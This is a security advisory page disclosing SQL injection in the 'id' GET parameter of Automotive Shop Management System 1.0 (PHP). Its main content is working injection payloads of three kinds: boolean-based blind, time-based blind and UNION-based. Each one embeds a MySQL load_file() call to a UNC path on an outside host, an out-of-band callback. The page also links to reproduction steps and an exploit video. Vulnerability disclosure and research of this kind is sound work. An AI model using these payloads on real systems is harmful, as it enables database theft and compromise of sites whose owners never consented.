Automotive Shop Management System 1.0 SQL Injection

2022.12.05
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: ASMS - PHP (by: oretnom23 ) v1.0 SQLi ## Author: nu11secur1ty ## Date: 12.03.2022 ## Vendor: https://github.com/oretnom23, https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/download-code?nid=15312&title=Automotive+Shop+Management+System+in+PHP%2FOOP+Free+Source+Code ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0 ## Description: The `id` parameter appears to be vulnerable to SQL injection attacks. The attacker can dump all database information without any problems, and then he can destroy this system, it is depending from the scenario. ## STATUS: Critically awful [+] Payload: ```MySQL --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: id=7'+(select load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+'' OR NOT 9828=9828 AND 'NWsG'='NWsG Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=7'+(select load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+'' AND (SELECT 9682 FROM (SELECT(SLEEP(5)))Oifb) AND 'zARc'='zARc Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: id=7'+(select load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+'' UNION ALL SELECT NULL,CONCAT(0x7176626271,0x71504455436c68624e7878795354674d76627a4b4164756a4c46537651584b67584d744963504b5a,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0) ## Proof and Exploit: [href](https://streamable.com/c5v75u) ## Time spent `00:27:00` ## Time attack `00:01:57`


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top